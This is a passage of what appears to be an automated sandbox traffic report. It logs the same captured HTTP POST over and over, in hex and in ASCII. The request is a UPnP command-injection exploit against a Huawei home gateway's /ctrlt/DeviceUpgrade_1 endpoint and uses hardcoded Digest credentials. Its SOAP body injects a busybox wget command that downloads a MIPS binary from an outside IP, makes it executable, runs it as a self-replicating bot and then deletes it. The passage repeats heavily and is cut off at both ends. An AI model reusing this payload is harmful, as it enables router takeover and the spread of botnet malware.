68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 